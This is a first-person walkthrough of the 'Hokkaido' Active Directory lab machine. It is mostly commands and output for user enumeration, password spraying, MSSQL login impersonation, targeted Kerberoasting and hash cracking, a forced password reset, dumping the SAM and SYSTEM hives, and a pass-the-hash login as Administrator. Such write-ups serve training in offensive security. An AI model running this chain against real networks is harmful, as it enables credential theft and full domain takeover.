The "Hokkaido" machine provided a comprehensive learning experience in Active Directory exploitation. By combining enumeration, credential harvesting, and privilege escalation techniques, I successfully compromised the target system. Try solving this challenge yourself it's a fantastic way to sharpen your skills!
Tipps and lessons for this machine:
Always explore SMB shares thoroughly—they often contain valuable information like passwords or configuration files.
Tools like
kerbruteandbloodhound-pythonare essential for identifying weak points in AD environments.Understanding privilege escalation techniques is crucial for moving laterally within a network.
Attack Narrative
1. Initial Reconnaissance
To begin, I performed an nmap scan to identify open ports and services on the target machine:
sudo nmap -sS -sV -sC -p- -T5 $IP
Key findings included:
Port 53/tcp : DNS service.
Port 80/tcp : Microsoft IIS HTTP server.
Port 135/tcp , 139/tcp , 445/tcp : NetBIOS and SMB services.
Port 389/tcp , 636/tcp , 3268/tcp , 3269/tcp : LDAP/SSL services.
Port 1433/tcp : Microsoft SQL Server.
Port 3389/tcp : Remote Desktop Protocol (RDP).
2. User Enumeration
Using the kerbrute tool, I enumerated valid usernames against the Kerberos service:
link to the tool: https://github.com/ropnop/kerbrute
link to the username list: https://github.com/danielmiessler/SecLists/blob/master/Usernames/xato-net-10-million-usernames.txt
└─$ ./kerbrute userenum --dc $IP -d hokkaido-aerospace.com /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 11/10/24 - Ronnie Flathers @ropnop
2024/11/10 06:03:58 > Using KDC(s):
2024/11/10 06:03:58 > 192.168.227.40:88
2024/11/10 06:03:59 > [+] VALID USERNAME: info@hokkaido-aerospace.com
2024/11/10 06:04:10 > [+] VALID USERNAME: administrator@hokkaido-aerospace.com
2024/11/10 06:04:16 > [+] VALID USERNAME: INFO@hokkaido-aerospace.com
2024/11/10 06:04:41 > [+] VALID USERNAME: Info@hokkaido-aerospace.com
2024/11/10 06:05:10 > [+] VALID USERNAME: discovery@hokkaido-aerospace.com
2024/11/10 06:05:12 > [+] VALID USERNAME: Administrator@hokkaido-aerospace.com
2024/11/10 06:17:44 > [+] VALID USERNAME: maintenance@hokkaido-aerospace.com
3. Credential Discovery
I conducted a password spray attack using netexec against the identified users:
└─$ netexec smb 192.168.227.40 -u users.txt -p users.txt
--[snip]--
SMB 192.168.227.40 445 DC [+] hokkaido-aerospace.com\info:info
--[snip]--
4. SMB Share Exploration
Using the info:info credentials, I explored the SMB shares and found a file named password_reset.txt in the NETLOGON share:
Share Permissions Remark
----- ----------- ------
ADMIN$ Remote Admin
C$ Default share
homes READ,WRITE user homes
IPC$ READ Remote IPC
NETLOGON READ Logon server share
- password_reset.txt :: Initial Password: Start123!
5. Password Spraying
Next, I sprayed the password Start123! against the previously enumerated usernames:
└─$ netexec smb 192.168.227.40 -u users.txt -p 'Start123!'
--[snip]--
SMB 192.168.227.40 445 DC [+] hokkaido-aerospace.com\discovery:Start123!
--[snip]--
6. Exploiting MSSQL
With the discovery credentials, I connected to the MSSQL server using impacket-mssqlclient:
impacket-mssqlclient 'hokkaido-aerospace.com/discovery':'Start123!'@192.168.227.40 -windows-auth -dc-ip 192.168.227.40
By impersonating the hrappdb-reader account, I queried the hrappdb database and uncovered credentials for the hrapp-service user:
Username:
hrapp-servicePassword:
Untimed$Runny
SQL (HAERO\discovery guest@master)> SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
name
--------------
hrappdb-reader
SQL (HAERO\discovery guest@master)> EXECUTE AS LOGIN = 'hrappdb-reader'
SQL (hrappdb-reader guest@master)> use hrappdb;
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: hrappdb
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'hrappdb'.
SQL (hrappdb-reader hrappdb-reader@hrappdb)> enable_xp_cmdshellERROR: Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (hrappdb-reader hrappdb-reader@hrappdb)> SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
hrappdb dbo sysauth b'BASE TABLE'
SQL (hrappdb-reader hrappdb-reader@hrappdb)> select * from sysauth;
id name password
-- ---------------- ----------------
0 b'hrapp-service' b'Untimed$Runny'
7. Kerberoasting
Using bloodhound-python, I mapped out relationships within the AD environment:
└─$ bloodhound-python -d hokkaido-aerospace.com -dc hokkaido-aerospace.com -u 'info' -p 'info' --zip -c All
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
INFO: Connecting to LDAP server: hokkaido-aerospace.com
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: hokkaido-aerospace.com
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 34 users
INFO: Found 62 groups
INFO: Found 2 gpos
INFO: Found 6 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer: dc.hokkaido-aerospace.com
INFO: Done in 00M 11S
INFO: Compressing output into 20241110062353_bloodhound.zip
On bloodhound, I found that the user hrapp-service has generic-write on Hazel.Green so I used targetedkerberoast.py to get the hash and crack it
└─$ python3 targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (Hazel.Green)
[+] Printing hash for (Hazel.Green)
$krb5tgs$23$*Hazel.Green$HOKKAIDO-AEROSPACE.COM$hokkaido-aerospace.com/Hazel.Green*$8674a45c...
└─$ hashcat hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
...6db0ec95b7001e:haze1988
8. Privilege Escalation
The Hazel.Green user belonged to the 2-tier-admin group, which controlled the 1-tier-admin group containing Molly.Smith. Using rpcclient, I reset the password for Molly.Smith:
└─$ rpcclient -N -U "Hazel.Green%haze1988" 192.168.227.40
rpcclient $> setuserinfo2 MOLLY.SMITH 23 'Password123!'
With these new credentials, I RDP'd into the machine and gained access as Molly.Smith.
└─$ xfreerdp /u:molly.smith /p:'Password123!' /v:192.168.227.40 +clipboard
9. Final Privilege Escalation
Once logged in, then i started PowerShell as admin and ran whoami /priv to see what privileges i have
Then i used the SeBackupPrivilege via PowerShell to extract the SAM and SYSTEM registry hives:
cmd /c "reg save HKLM\SAM & reg save HKLM\SYSTEM SYSTEM"
After i moved them to my machine i used impackets-secretsdump to extract the hashses
└─$ impacket-secretsdump -system SYSTEM local -sam SAM
Impacket v0.12.0.dev1+20240523.75507.15eff880 - Copyright 2023 Fortra
[*] Target system bootKey: 0x9ee80337b5848e02903e9c792b816b42
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f1014ac49bae005ee3ece5f47547d185:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:0c6ce171c9cc3afb29ca0ccc335e49bb:::
[*] Cleaning up...
Finally, I used evil-winrm to perform a pass the hash attack to authenticate as the Administrator user and completed the challenge:
└─$ evil-winrm -i 192.168.227.40 -u 'administrator' -H "d752482897d54e239376fddb2a2109e4"
*Evil-WinRM* PS C:\Users\Administrator\Documents>